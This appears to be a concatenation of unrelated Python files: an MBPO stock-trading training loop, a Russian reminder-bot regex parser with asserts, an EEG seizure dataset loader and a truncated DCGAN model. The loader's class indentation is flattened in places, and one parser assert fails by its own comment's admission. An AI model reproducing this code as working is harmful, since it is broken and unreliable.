        """Pickle the (potentially huge) rollout statistics to disk."""
        with open("mbpo_stats.pkl", "wb") as f:
            pickle.dump(self.dynamics_model_stat, f)

    def train(
        self,
        train_env: StockTradingEnv,
        val_env: StockTradingEnv,
    ):
        """
        Run the MBPO training loop.

        Alternates between collecting real transitions from ``train_env``,
        retraining the dynamics model, rolling the model out to fill the
        SAC buffer, and updating the SAC agent.  Periodically evaluates on
        ``val_env`` and early-stops (saving a checkpoint) once the metric
        targets have been met for several consecutive evaluations.

        Returns
        -------
        The best (annual_return, sharpe, max_drawdown) metrics as float32.
        """
        obs_shape = train_env.observation_space.shape
        act_shape = train_env.action_space.shape
        self.agent.stat_path = "Q_loss.npy"
        work_dir = os.getcwd()
        # enable_back_compatible so the pytorch_sac agent can use this logger.
        logger = mbrl_util.Logger(work_dir, enable_back_compatible=True)
        logger.register_group(
            mbrl_constants.RESULTS_LOG_NAME,
            MBPO_LOG_FORMAT,
            color="green",
            dump_frequency=1,
        )
        rng = np.random.default_rng(seed=self.cfg.seed)
        torch_generator = torch.Generator(device=self.cfg.device)
        if self.cfg.seed is not None:
            torch_generator.manual_seed(self.cfg.seed)
        # -------------- Create initial dataset --------------
        use_double_dtype = self.cfg.algorithm.get("normalize_double_precision", False)
        dtype = np.double if use_double_dtype else np.float32
        replay_buffer: ReplayBuffer = mbrl_common.create_replay_buffer(
            self.cfg,
            obs_shape,
            act_shape,
            rng=rng,
            obs_type=dtype,
            action_type=dtype,
            reward_type=dtype,
        )
        random_explore = self.cfg.algorithm.random_initial_explore
        self.flogger.info("rollout_agent_trajectories ...")
        mbrl_common.rollout_agent_trajectories(
            train_env,
            # Number of steps sampled from the real environment; may need to
            # cover every trading day of the training data.
            self.cfg.algorithm.initial_exploration_steps,
            mbrl_planning.RandomAgent(train_env) if random_explore else self.agent,
            {} if random_explore else {"sample": True, "batched": False},
            replay_buffer=replay_buffer,
        )
        epoch_length = self.cfg.overrides.epoch_length
        # --------------------- Training Loop ---------------------
        rollout_batch_size = (
            self.cfg.overrides.effective_model_rollouts_per_step
            * self.cfg.algorithm.freq_train_model
        )
        trains_per_epoch = int(
            np.ceil(epoch_length / self.cfg.overrides.freq_train_model)
        )
        updates_made = 0
        env_steps = 0
        model_env = ModelEnv(
            train_env,
            self.dynamics_model,
            self.termination_fn,
            None,
            generator=torch_generator,
        )
        model_trainer = ModelTrainer(
            self.dynamics_model,
            optim_lr=self.cfg.overrides.model_lr,
            weight_decay=self.cfg.overrides.model_wd,
            logger=logger,
        )
        metric_best = (-np.inf, -np.inf, -np.inf)
        epoch = 0
        sac_buffer = None
        early_stop = False
        eval_times = 0
        metric_buff = []
        while env_steps < self.cfg.overrides.num_steps and not early_stop:
            # Rollout horizon for this epoch.  With the default
            # rollout_schedule=[1, 15, 1, 1] truncated_linear yields a
            # constant; see mbrl.util.math.truncated_linear for the formula.
            if self.cfg.overrides.dynamic_rollout:
                rollout_length = int(
                    mbrl_util.truncated_linear(
                        1,
                        math.ceil(self.cfg.overrides.num_steps / epoch_length),
                        self.cfg.overrides.rollout_schedule[0],
                        self.cfg.overrides.rollout_schedule[1],
                        epoch + 1,
                    )
                )
            else:
                rollout_length = 1
            # Size the SAC buffer so it can retain the imagined transitions
            # of the last num_epochs_to_retain_sac_buffer epochs.
            if self.cfg.dynamics_model.model.propagation_method == "mask":
                sac_buffer_capacity = (
                    rollout_length
                    * max(
                        1,
                        int(
                            rollout_batch_size
                            * self.cfg.dynamics_model.model.min_mask_ratio
                        ),
                    )
                    * trains_per_epoch
                )
            else:
                sac_buffer_capacity = (
                    rollout_length * rollout_batch_size * trains_per_epoch
                )
            sac_buffer_capacity *= self.cfg.overrides.num_epochs_to_retain_sac_buffer
            sac_buffer = self.maybe_replace_sac_buffer(
                sac_buffer,
                sac_buffer_capacity,
                obs_shape,
                act_shape,
            )
            obs, done = None, False
            for steps_epoch in range(epoch_length):
                # At most epoch_length days of real data are consumed per
                # epoch; may need to change to the full training period.
                if steps_epoch == 0 or done:
                    self.flogger.info("reset train env")
                    obs, done = train_env.reset(), False
                # --- Do env step and add to model dataset ---
                next_obs, reward, done, _ = mbrl_common.step_env_and_add_to_buffer(
                    train_env, obs, self.agent, {}, replay_buffer
                )
                # --------------- Model Training -----------------
                # The dynamics model is retrained every freq_train_model
                # real environment steps.
                if (env_steps + 1) % self.cfg.overrides.freq_train_model == 0:
                    self.flogger.info("training dynamic model ...")
                    mbrl_common.train_model_and_save_model_and_data(
                        self.dynamics_model,
                        model_trainer,
                        self.cfg.overrides,
                        replay_buffer,
                        work_dir=work_dir,
                    )
                    # --------- Rollout new model and store imagined trajectories --------
                    # Batch all rollouts for the next freq_train_model steps together.
                    self.flogger.info(f"env_steps: {env_steps}, rollout ...")
                    self.rollout_model_and_populate_sac_buffer(
                        model_env,
                        replay_buffer,
                        sac_buffer,
                        self.cfg.algorithm.sac_samples_action,
                        rollout_length,  # rollout horizon
                        rollout_batch_size,  # rollout batch size
                    )
                # --------------- Agent Training -----------------
                # Number of SAC updates performed per real environment step.
                for _ in range(self.cfg.overrides.num_sac_updates_per_step):
                    if (
                        env_steps + 1
                    ) % self.cfg.overrides.sac_updates_every_steps != 0 or len(
                        sac_buffer
                    ) < rollout_batch_size:
                        break  # only update every once in a while
                    self.agent.update(sac_buffer, logger, updates_made)
                    updates_made += 1
                    if updates_made % self.cfg.log_frequency_agent == 0:
                        logger.dump(updates_made, save=True)
                # ------ Evaluation and early stopping ------
                if (env_steps + 1) % self.cfg.overrides.freq_evaluate == 0:
                    self.flogger.info(f"env_steps: {env_steps}, evaluating ...")
                    _, df_stat, pred_actions = self.evaluate(val_env)
                    # Early-stop once annual return / sharpe / max drawdown
                    # beat the target for buff_size consecutive evaluations.
                    target_metric = list(self.cfg.overrides.target_metric)  # e.g. (0.16, 1.2, -0.11)
                    # annual_return, sharpe, max_drawdown
                    metric = [df_stat[0], df_stat[3], df_stat[6]]
                    # Ring buffer with the most recent evaluation metrics.
                    buff_size = 3
                    if len(metric_buff) < buff_size:
                        metric_buff.append(metric)
                    else:
                        metric_buff[eval_times % buff_size] = metric
                    eval_times += 1
                    self.flogger.info(f"metric_buff: {metric_buff}, targe: {target_metric}")
                    if len(metric_buff) == buff_size:
                        # Lists compare lexicographically; a buffered metric
                        # "matches" when it is not smaller than the target.
                        all_match = all(
                            not (m < target_metric) for m in metric_buff
                        )
                        self.print_movement_stats(val_env, pred_actions)
                        if (
                            env_steps > self.cfg.overrides.save_min_steps
                            and all_match
                        ):
                            self.flogger.info(f"do early stop, steps: {env_steps} .")
                            metric_best = metric
                            self.save_checkpiont()
                            early_stop = self.cfg.overrides.use_earlystop
                            break
                env_steps += 1
                obs = next_obs
            epoch += 1
        self.flogger.info("train done.")
        self.agent.save_stats()
        plot.draw_loss(self.agent.stat_path)
        # The rollout statistics can exceed tens of GB; not saved by default.
        if self.cfg.overrides.save_rollout_stats:
            self.save_stats()
            analysis.draw(self.dynamics_model_stat, Path("./"))
        return np.float32(metric_best)
|
# coding:utf-8
__author__ = '4ikist'
import re
def retrieve_type(text):
    """
    Return the notification urgency (1-3) encoded by '!' marks in *text*.

    The length of the first run of 1-3 exclamation marks is the urgency;
    text without any '!' defaults to 1.
    """
    # Raw string: '\!' in a normal string literal is an invalid escape
    # sequence (SyntaxWarning on modern Python); '!' needs no escaping.
    found = re.findall(r"(!{1,3})", text, re.IGNORECASE)
    if found:
        return len(found[0])
    return 1
def retrieve_notification_message(text):
    """
    Return the message part after the last ':' + whitespace in *text*,
    stripped; None when no such separator exists.
    """
    # Greedy ".*" anchors on the LAST colon followed by whitespace, so
    # times like "22:30" earlier in the text are skipped.  Raw string
    # avoids the invalid '\:' escape of the original.
    found = re.findall(r".*:\s(.*)", text)
    if found:
        return found[0].strip()
    return None
def retrieve_yes(text):
    """
    Return True if *text* contains an affirmative token (Russian/English
    'yes'-words, smileys, or keyboard-layout slips like 'lf'); None otherwise.
    """
    # re.search is truthy iff re.findall would be non-empty; raw string
    # avoids the invalid '\:' escape of the original.
    affirmative = re.search(
        r"(да)|(ок)|(ok)|(yes)|(хорошо)|(:\))|(\))|(ладно)|(давай)|(щл)|(lf)",
        text,
        re.IGNORECASE,
    )
    if affirmative:
        return True
    return None
def retrieve_utc(text):
    """
    Parse a signed integer UTC offset out of *text*.

    Returns the first integer found (sign included), or None when the
    text contains no digits.
    """
    found = re.findall(r"[-+]?\d+", text)
    if found:
        # BUG FIX: previously `int(text)` was returned, which raised
        # ValueError whenever the text contained anything besides the
        # number itself (e.g. "utc +6") despite the regex having matched.
        return int(found[0])
    return None
def retrieve_set_utc(text):
    """
    Parse commands of the form "set utc <offset>".

    Returns the signed integer offset, or None when the text is not a
    "set utc" command.
    """
    found = re.findall(r"(set utc )([-+]?\d+)", text)
    if found:
        # found[0] is the (prefix, offset) group tuple of the first match.
        return int(found[0][1])
    return None
def retrieve_mentioned(text):
    """
    Extract the addressees of a reminder phrased as "для <names> напомни".

    Each comma-separated name is classified as:
      * {'id': <digits>}   for tokens like "id12345"
      * {'domain': <name>} for purely latin/numeric screen names
      * {'name': [...]}    otherwise (split into words)

    Returns None when the text does not match the pattern.
    """
    # Raw strings avoid the invalid '\s' / '\d' escapes of the original.
    found = re.match(r"для\s(?P<names>.*)\sнапомни", text, re.IGNORECASE)
    if found is None:
        return None
    result = []
    for name in found.group('names').split(','):
        name = name.strip()
        if re.match(r'id\d+', name):
            result.append({'id': name[2:]})
        elif re.match(r'^[a-z0-9_\.]+$', name):
            result.append({'domain': name})
        else:
            result.append({'name': name.split()})
    return result
# Inline smoke tests for the parsing helpers above; run this module directly
# to execute them.
if __name__ == '__main__':
    assert retrieve_type(u'hui') == 1
    assert retrieve_type(u'hui!') == 1
    assert retrieve_type(u'hui!!') == 2
    assert retrieve_type(u'hui!!!') == 3
    assert retrieve_notification_message(
        u"напомни мне в 22:30 что: тебе нужно пойти спать") == u"тебе нужно пойти спать"
    assert retrieve_yes(u"пиздец да!")
    assert retrieve_yes(u"пиздец хорошо!")
    assert retrieve_yes(u"ладно")
    assert retrieve_yes(u"ок")
    assert retrieve_yes(u"ok!")
    assert retrieve_yes(u"давай")
    assert retrieve_yes(u")")
    assert retrieve_yes(u":)")
    assert retrieve_yes(u"lf")
    assert not retrieve_yes(u'нет')
    assert retrieve_set_utc(u'set utc +6') == 6
    assert retrieve_set_utc(u'+6') == None
    assert retrieve_set_utc(u'-6') == None
    assert retrieve_utc(u'+6') == 6
    assert retrieve_mentioned(u"для 4ikist, sederfes напомни") == [{'domain': u'4ikist'}, {'domain': u'sederfes'}]
    assert retrieve_mentioned(u"для алины луценко напомни") == [{'name': [u'алины', u'луценко']}]
    assert retrieve_mentioned(u"для алины луценко напомни") == [{'name': [u'алины', u'луценко']}]
    # NOTE(review): "<NAME>" looks like an anonymization placeholder that
    # replaced the original names; as written this assert fails at runtime
    # (the parser would yield {'name': ['<NAME>']}) -- restore the original
    # names to re-enable it.
    assert retrieve_mentioned(u"для меня, <NAME> напомни") == [{'name': [u'меня']},
                                                               {'name': [u'enjoily', u'prigmann']}]
    assert retrieve_mentioned(u"для id12345, луценко напомни") == [{'id': u'12345'}, {'name': [u'луценко']}, ]
|
import sys
sys.path.append('../')
from pathlib import Path
import scipy.signal
import scipy
import pickle
import os
import numpy as np
import h5py
import math
import torch
from torch.utils.data import Dataset, DataLoader
from utils import StandardScaler
from constants import INCLUDED_CHANNELS, FREQUENCY
from data.data_utils import *
import utils
import pyedflib
# Derive the repository root from the current working directory: everything
# up to and including the "eeg-gnn-ssl" directory.
repo_paths = str(Path.cwd()).split('eeg-gnn-ssl')
repo_paths = Path(repo_paths[0]).joinpath('eeg-gnn-ssl')
# BUG FIX: sys.path entries must be plain strings; appending a Path object
# is not reliably handled by the import machinery.
sys.path.append(str(repo_paths))
# Directory holding the precomputed train/dev/test file-marker lists.
FILEMARKER_DIR = Path(repo_paths).joinpath('data/file_markers_ssl')
def computeSliceMatrix(
        h5_fn,
        edf_fn,
        clip_idx,
        time_step_size=1,
        clip_len=60,
        is_fft=False):
    """
    Convert entire EEG sequence into clips of length clip_len
    Args:
        h5_fn: file name of resampled signal h5 file (full path)
        edf_fn: file name of the original edf file (full path); used to
            look up the seizure annotation times
        clip_idx: index of current clip/sliding window
        time_step_size: length of each time_step_size, in seconds, int
        clip_len: sliding window size or EEG clip length, in seconds, int
        is_fft: whether to perform FFT on raw EEG data
    Returns:
        eeg_clip: eeg clip, shape (clip_len, num_channels, time_step_size*freq)
    """
    with h5py.File(h5_fn, 'r') as f:
        signal_array = f["resampled_signal"][()]
        resampled_freq = f["resample_freq"][()]
    assert resampled_freq == FREQUENCY
    # get seizure times
    # NOTE(review): seizure_times is never used below -- dead assignment,
    # possibly left over from a labeling variant; confirm before removing.
    seizure_times = getSeizureTimes(edf_fn.split('.edf')[0])
    # Iterating through signal: select the clip_idx-th window of
    # clip_len seconds (in samples).
    physical_clip_len = int(FREQUENCY * clip_len)
    physical_time_step_size = int(FREQUENCY * time_step_size)
    start_window = clip_idx * physical_clip_len
    end_window = start_window + physical_clip_len
    # (num_channels, physical_clip_len)
    curr_slc = signal_array[:, start_window:end_window]
    # Split the window into consecutive time steps of time_step_size
    # seconds; any trailing remainder shorter than a step is dropped.
    start_time_step = 0
    time_steps = []
    while start_time_step <= curr_slc.shape[1] - physical_time_step_size:
        end_time_step = start_time_step + physical_time_step_size
        # (num_channels, physical_time_step_size)
        curr_time_step = curr_slc[:, start_time_step:end_time_step]
        if is_fft:
            curr_time_step, _ = computeFFT(
                curr_time_step, n=physical_time_step_size)
        time_steps.append(curr_time_step)
        start_time_step = end_time_step
    eeg_clip = np.stack(time_steps, axis=0)
    return eeg_clip
class SeizureDataset(Dataset):
def __init__(
self,
input_dir,
raw_data_dir,
time_step_size=1,
input_len=60,
output_len=12,
standardize=True,
scaler=None,
split='train',
data_augment=False,
adj_mat_dir=None,
graph_type=None,
top_k=None,
filter_type='laplacian',
use_fft=False,
preproc_dir=None):
"""
Args:
input_dir: dir to resampled signals h5 files
raw_data_dir: dir to TUSZ edf files
time_step_size: int, in seconds
input_len: int, input EEG clip length, in seconds
output_len: int, output EEG clip length, in seconds
standardize: if True, will z-normalize wrt train set
scaler: scaler object for standardization
split: train, dev or test
data_augment: if True, perform random augmentation on EEG
adj_mat_dir: dir to pre-computed distance graph adjacency matrix
graph_type: 'combined' (i.e. distance graph) or 'individual' (correlation graph)
top_k: int, top-k neighbors of each node to keep. For correlation graph only
filter_type: 'laplacian' for distance graph, 'dual_random_walk' for correlation graph
use_fft: whether perform Fourier transform
preproc_dir: dir to preprocessed Fourier transformed data, optional
"""
if standardize and (scaler is None):
raise ValueError('To standardize, please provide scaler.')
if (graph_type == 'individual') and (top_k is None):
raise ValueError('Please specify top_k for individual graph.')
self.input_dir = input_dir
self.raw_data_dir = raw_data_dir
self.time_step_size = time_step_size
self.input_len = input_len
self.output_len = output_len
self.standardize = standardize
self.scaler = scaler
self.split = split
self.data_augment = data_augment
self.adj_mat_dir = adj_mat_dir
self.graph_type = graph_type
self.top_k = top_k
self.filter_type = filter_type
self.use_fft = use_fft
self.preproc_dir = preproc_dir
# get full paths to all raw edf files
self.edf_files = []
for path, subdirs, files in os.walk(raw_data_dir):
for name in files:
if ".edf" in name:
self.edf_files.append(os.path.join(path, name))
file_marker_dir = os.path.join(
FILEMARKER_DIR,
split +
'Set_seq2seq_' +
str(input_len) +
's.txt')
with open(file_marker_dir, 'r') as f:
f_str = f.readlines()
self.file_tuples = [f_str[i].strip('\n').split(',') for i in range(len(f_str))]
self.size = len(self.file_tuples)
# get sensor ids
self.sensor_ids = [x.split(' ')[-1] for x in INCLUDED_CHANNELS]
    def __len__(self):
        """Return the number of (input, output) clip pairs in this split."""
        return self.size
def _random_reflect(self, EEG_seq, reflect=False):
"""
Randomly reflect EEG channels along the midline
"""
swap_pairs = get_swap_pairs(INCLUDED_CHANNELS)
EEG_seq_reflect = EEG_seq.copy()
if reflect:
for pair in swap_pairs:
EEG_seq_reflect[:,[pair[0],pair[1]],:] = EEG_seq[:,[pair[1], pair[0]],:]
else:
swap_pairs = None
return EEG_seq_reflect, swap_pairs
def _random_scale(self, EEG_seq, scale_factor=None):
"""
Scale EEG signals by a random number between 0.8 and 1.2
"""
if scale_factor is None:
scale_factor = np.random.uniform(0.8, 1.2)
if self.use_fft:
EEG_seq += np.log(scale_factor)
else:
EEG_seq *= scale_factor
return EEG_seq
    def _get_indiv_graphs(self, eeg_clip, swap_nodes=None):
        """
        Compute adjacency matrix for correlation graph
        Args:
            eeg_clip: shape (seq_len, num_nodes, input_dim)
            swap_nodes: list of swapped node index
        Returns:
            adj_mat: adjacency matrix, shape (num_nodes, num_nodes)

        Raises:
            ValueError: if self.top_k is None (top-k sparsification is
                mandatory for the correlation graph).
        """
        num_sensors = len(self.sensor_ids)
        adj_mat = np.eye(num_sensors, num_sensors,
                         dtype=np.float32)  # diagonal is 1
        # (num_nodes, seq_len, input_dim)
        eeg_clip = np.transpose(eeg_clip, (1, 0, 2))
        assert eeg_clip.shape[0] == num_sensors
        # (num_nodes, seq_len*input_dim)
        eeg_clip = eeg_clip.reshape((num_sensors, -1))
        sensor_id_to_ind = {}
        for i, sensor_id in enumerate(self.sensor_ids):
            sensor_id_to_ind[sensor_id] = i
        # NOTE(review): the swap below updates sensor_id_to_ind, but the
        # mapping is never read after this point in this method -- the
        # cross-correlations are computed on raw indices; confirm whether
        # swap_nodes should also permute eeg_clip rows here.
        if swap_nodes is not None:
            for node_pair in swap_nodes:
                node_name0 = [
                    key for key,
                    val in sensor_id_to_ind.items() if val == node_pair[0]][0]
                node_name1 = [
                    key for key,
                    val in sensor_id_to_ind.items() if val == node_pair[1]][0]
                sensor_id_to_ind[node_name0] = node_pair[1]
                sensor_id_to_ind[node_name1] = node_pair[0]
        # Symmetric matrix of pairwise normalized cross-correlations.
        for i in range(0, num_sensors):
            for j in range(i + 1, num_sensors):
                xcorr = comp_xcorr(
                    eeg_clip[i, :], eeg_clip[j, :], mode='valid', normalize=True)
                adj_mat[i, j] = xcorr
                adj_mat[j, i] = xcorr
        # Edge weight is the correlation magnitude, sign discarded.
        adj_mat = abs(adj_mat)
        if (self.top_k is not None):
            adj_mat = keep_topk(adj_mat, top_k=self.top_k, directed=True)
        else:
            raise ValueError('Invalid top_k value!')
        return adj_mat
def _get_combined_graph(self, swap_nodes=None):
    """
    Get adjacency matrix for pre-computed distance graph
    Args:
        swap_nodes: list of swapped node index pairs (from reflection
            augmentation), or None for the unmodified graph
    Returns:
        adj_mat_new: adjacency matrix, shape (num_nodes, num_nodes)
    """
    with open(self.adj_mat_dir, 'rb') as pf:
        adj_mat = pickle.load(pf)
        # The pickled object's last element holds the matrix.
        adj_mat = adj_mat[-1]
    adj_mat_new = adj_mat.copy()
    # Mirror each channel swap by exchanging the pair's rows and columns.
    # All reads come from the ORIGINAL matrix so earlier writes within the
    # same pair are never re-swapped; diagonal entries are pinned to 1.
    if swap_nodes is not None:
        for node_pair in swap_nodes:
            for i in range(adj_mat.shape[0]):
                adj_mat_new[node_pair[0], i] = adj_mat[node_pair[1], i]
                adj_mat_new[node_pair[1], i] = adj_mat[node_pair[0], i]
                adj_mat_new[i, node_pair[0]] = adj_mat[i, node_pair[1]]
                adj_mat_new[i, node_pair[1]] = adj_mat[i, node_pair[0]]
                adj_mat_new[i, i] = 1
            # The (pair, pair) cross entries need the transposed originals.
            adj_mat_new[node_pair[0], node_pair[1]
                        ] = adj_mat[node_pair[1], node_pair[0]]
            adj_mat_new[node_pair[1], node_pair[0]
                        ] = adj_mat[node_pair[0], node_pair[1]]
    return adj_mat_new
def _compute_supports(self, adj_mat):
    """Build graph-convolution support matrices for ``adj_mat``.

    The support kind depends on ``self.filter_type``:
      * "laplacian"        -- scaled Laplacian (ChebNet-style conv)
      * "random_walk"      -- forward random-walk transition matrix
      * "dual_random_walk" -- forward and backward random-walk matrices
      * anything else      -- scaled Laplacian with default lambda_max

    Returns a list of dense torch.FloatTensor supports.
    """
    filter_type = self.filter_type
    if filter_type == "laplacian":
        sparse_supports = [utils.calculate_scaled_laplacian(adj_mat, lambda_max=None)]
    elif filter_type == "random_walk":
        sparse_supports = [utils.calculate_random_walk_matrix(adj_mat).T]
    elif filter_type == "dual_random_walk":
        sparse_supports = [
            utils.calculate_random_walk_matrix(adj_mat).T,
            utils.calculate_random_walk_matrix(adj_mat.T).T,
        ]
    else:
        sparse_supports = [utils.calculate_scaled_laplacian(adj_mat)]
    return [torch.FloatTensor(mat.toarray()) for mat in sparse_supports]
def __getitem__(self, idx):
    """
    Args:
        idx: (int) index in [0, 1, ..., size_of_dataset-1]
    Returns:
        a tuple of (x, y, seq_len, supports, adj_mat, writeout_fn)
    """
    h5_fn_x, h5_fn_y = self.file_tuples[idx]
    # Recover the source edf name and the clip indices encoded in the h5
    # file names (format: <edf-name>.edf_<clip-idx>.h5).
    edf_fn = h5_fn_x.split('.edf')[0] + '.edf'
    clip_idx_x = int(h5_fn_x.split('_')[-1].split('.h5')[0])
    clip_idx_y = int(h5_fn_y.split('_')[-1].split('.h5')[0])
    edf_file = [file for file in self.edf_files if edf_fn in file]
    assert len(edf_file) == 1
    edf_file = edf_file[0]
    # preprocess
    if self.preproc_dir is None:
        # No preprocessed cache: slice (and optionally FFT) on the fly
        # from the resampled-signal h5 file.
        resample_sig_dir = os.path.join(
            self.input_dir, h5_fn_x.split('.edf')[0] + '.h5')
        eeg_clip_x = computeSliceMatrix(
            h5_fn=resample_sig_dir, edf_fn=edf_file, clip_idx=clip_idx_x,
            time_step_size=self.time_step_size, clip_len=self.input_len,
            is_fft=self.use_fft)
        eeg_clip_y = computeSliceMatrix(
            h5_fn=resample_sig_dir, edf_fn=edf_file, clip_idx=clip_idx_y,
            time_step_size=self.time_step_size, clip_len=self.input_len,
            is_fft=self.use_fft)
    else:
        with h5py.File(os.path.join(self.preproc_dir, h5_fn_x), 'r') as hf:
            eeg_clip_x = hf['clip'][()]
        with h5py.File(os.path.join(self.preproc_dir, h5_fn_y), 'r') as hf:
            eeg_clip_y = hf['clip'][()]
    # data augmentation
    if self.data_augment:
        # reflect or not reflect for both x and y (same decision so the
        # input/target pair stays spatially consistent)
        reflect = np.random.choice([True, False])
        x_feature, swap_nodes = self._random_reflect(eeg_clip_x, reflect=reflect)
        y_feature, _ = self._random_reflect(eeg_clip_y, reflect=reflect)
        # scale by the same factor for both x and y
        scale_factor = np.random.uniform(0.8, 1.2)
        x_feature = self._random_scale(x_feature, scale_factor=scale_factor)
        y_feature = self._random_scale(y_feature, scale_factor=scale_factor)
    else:
        swap_nodes = None
        x_feature = eeg_clip_x.copy()
        y_feature = eeg_clip_y.copy()
    # standardize wrt train mean and std
    if self.standardize:
        x_feature = self.scaler.transform(x_feature)
        y_feature = self.scaler.transform(y_feature)
    # convert to tensors
    # (max_seq_len, num_nodes, input_dim)
    x = torch.FloatTensor(x_feature)
    y = torch.FloatTensor(y_feature[:self.output_len,:,:])
    assert x.shape[0] == self.input_len
    assert y.shape[0] == self.output_len
    seq_len = torch.LongTensor([self.input_len])
    writeout_fn = h5_fn_x.split('.h5')[0]
    # get adjacency matrix for graphs
    if self.graph_type == 'individual':
        # Correlation graph computed per clip, with the same node swaps
        # as the reflection augmentation.
        indiv_adj_mat = self._get_indiv_graphs(eeg_clip_x, swap_nodes)
        indiv_supports = self._compute_supports(indiv_adj_mat)
        curr_support = np.concatenate(indiv_supports, axis=0)
        if np.any(np.isnan(curr_support)):
            raise ValueError("Nan found in indiv_supports!")
    elif self.adj_mat_dir is not None:
        # Pre-computed distance graph shared across clips.
        indiv_adj_mat = self._get_combined_graph(swap_nodes)
        indiv_supports = self._compute_supports(indiv_adj_mat)
    else:
        indiv_supports = []
        indiv_adj_mat = []
    return (x, y, seq_len, indiv_supports, indiv_adj_mat, writeout_fn)
def load_dataset_ssl(
        input_dir,
        raw_data_dir,
        train_batch_size,
        test_batch_size,
        time_step_size=1,
        input_len=60,
        output_len=12,
        standardize=True,
        num_workers=8,
        augmentation=False,
        adj_mat_dir=None,
        graph_type=None,
        top_k=None,
        filter_type='laplacian',
        use_fft=False,
        preproc_dir=None):
    """
    Args:
        input_dir: dir to resampled signals h5 file
        raw_data_dir: dir to TUSZ raw edf files
        train_batch_size: int
        test_batch_size: int
        time_step_size: int, in seconds
        input_len: int, input clip length, in seconds
        output_len: int, output clip length, in seconds
        standardize: if True, will z-normalize wrt train set
        num_workers: int
        augmentation: if True, perform random augmentation of EEG seq
        adj_mat_dir: dir to pre-computed distance graph adjacency matrix
        graph_type: 'combined' (i.e. distance graph) or 'individual' (correlation graph)
        top_k: int, top-k neighbors of each node to keep. For correlation graph only
        filter_type: 'laplacian' for distance graph, 'dual_random_walk' for correlation graph
        use_fft: whether perform Fourier transform
        preproc_dir: dir to preprocessed Fourier transformed data, optional
    Returns:
        dataloaders: dictionary of train/dev/test dataloaders
        datasets: dictionary of train/dev/test datasets
        scaler: standard scaler
    Raises:
        NotImplementedError: for an unrecognized graph_type
    """
    if (graph_type is not None) and (
            graph_type not in ['individual', 'combined']):
        raise NotImplementedError
    # load per-node mean and std (precomputed over the train split and
    # stored under FILEMARKER_DIR, keyed by input clip length)
    if standardize:
        means_dir = os.path.join(
            FILEMARKER_DIR, 'means_seq2seq_fft_'+str(input_len)+'s_single.pkl')
        stds_dir = os.path.join(
            FILEMARKER_DIR, 'stds_seq2seq_fft_'+str(input_len)+'s_single.pkl')
        with open(means_dir, 'rb') as f:
            means = pickle.load(f)
        with open(stds_dir, 'rb') as f:
            stds = pickle.load(f)
        scaler = StandardScaler(mean=means, std=stds)
    else:
        scaler = None
    dataloaders = {}
    datasets = {}
    for split in ['train', 'dev', 'test']:
        if split == 'train':
            data_augment = augmentation
        else:
            data_augment = False  # no augmentation on dev/test sets
        dataset = SeizureDataset(input_dir=input_dir,
                                 raw_data_dir=raw_data_dir,
                                 time_step_size=time_step_size,
                                 input_len=input_len,
                                 output_len=output_len,
                                 standardize=standardize,
                                 scaler=scaler,
                                 split=split,
                                 data_augment=data_augment,
                                 adj_mat_dir=adj_mat_dir,
                                 graph_type=graph_type,
                                 top_k=top_k,
                                 filter_type=filter_type,
                                 use_fft=use_fft,
                                 preproc_dir=preproc_dir)
        # Only the train loader is shuffled.
        if split == 'train':
            shuffle = True
            batch_size = train_batch_size
        else:
            shuffle = False
            batch_size = test_batch_size
        loader = DataLoader(dataset=dataset,
                            shuffle=shuffle,
                            batch_size=batch_size,
                            num_workers=num_workers)
        dataloaders[split] = loader
        datasets[split] = dataset
    return dataloaders, datasets, scaler
|
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from tensorflow.keras.layers import Dense, Flatten, Conv2D, Conv2DTranspose, \
Reshape, BatchNormalization, LeakyReLU, Dropout
from tensorflow.keras import Model
# Hyperparameters for the DCGAN training run.
LATENT_DIM = 100  # size of the generator's input noise vector
NUM_EPOCHS = 50
BATCH_SIZE = 256
LEARNING_RATE = 1e-4
# Running metrics, updated inside the train step; the two losses are
# printed and reset once per epoch in train().
d_train_loss = tf.keras.metrics.Mean(name='disc_train_loss')
g_train_accuracy = tf.keras.metrics.BinaryAccuracy(name='gen_train_accuracy')
g_train_loss = tf.keras.metrics.Mean(name='gen_train_loss')
# Separate Adam optimizers so generator and discriminator keep
# independent moment estimates.
disc_optimizer = tf.keras.optimizers.Adam(LEARNING_RATE)
gen_optimizer = tf.keras.optimizers.Adam(LEARNING_RATE)
# from_logits=True: the discriminator's Dense(1) head outputs raw logits.
loss_cross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)
def loss_discriminator_obj(real, fake):
    """Discriminator loss: real logits pushed toward 1, fake logits toward 0."""
    loss_on_real = loss_cross_entropy(tf.ones_like(real), real)
    loss_on_fake = loss_cross_entropy(tf.zeros_like(fake), fake)
    total_loss = loss_on_real + loss_on_fake
    return total_loss
def loss_generator_obj(fake):
    """Generator loss: reward fooling the discriminator into predicting 1 on fakes."""
    target = tf.ones_like(fake)
    return loss_cross_entropy(target, fake)
class GANDiscriminator(Model):
    """DCGAN discriminator: two strided 5x5 leaky-ReLU convolutions with
    dropout, flattened into a single real/fake logit."""

    def __init__(self):
        super(GANDiscriminator, self).__init__()
        # 28x28x1 -> 14x14x64 -> 7x7x128 -> logit
        self.conv1 = Conv2D(64, 5, activation=tf.nn.leaky_relu, strides=2,
                            padding='SAME', input_shape=(28, 28, 1))
        self.dropout1 = Dropout(0.3)
        self.conv2 = Conv2D(128, 5, activation=tf.nn.leaky_relu, strides=2,
                            padding='SAME')
        self.dropout2 = Dropout(0.3)
        self.flatten = Flatten()
        self.d1 = Dense(1)

    def call(self, x):
        out = self.dropout1(self.conv1(x))
        out = self.dropout2(self.conv2(out))
        return self.d1(self.flatten(out))
class GANGenerator(Model):
    """DCGAN generator: dense projection to a 7x7x256 feature map, then three
    transposed convolutions upsampling to a 28x28x1 tanh image."""

    def __init__(self, latent_dim):
        super(GANGenerator, self).__init__()
        self.d1 = Dense(7 * 7 * 256, input_dim=latent_dim, use_bias=False)
        self.bn1 = BatchNormalization()
        self.leaky_relu1 = LeakyReLU()
        self.resh = Reshape((7, 7, 256))
        # 7x7x256 -> 7x7x128 -> 14x14x64 -> 28x28x1
        self.conv1t = Conv2DTranspose(128, 5, strides=1,
                                      padding='SAME', input_shape=(7, 7, 256), use_bias=False)
        self.bn2 = BatchNormalization()
        self.leaky_relu2 = LeakyReLU()
        self.conv2t = Conv2DTranspose(64, 5, strides=2,
                                      padding='SAME', input_shape=(7, 7, 128), use_bias=False)
        self.bn3 = BatchNormalization()
        self.leaky_relu3 = LeakyReLU()
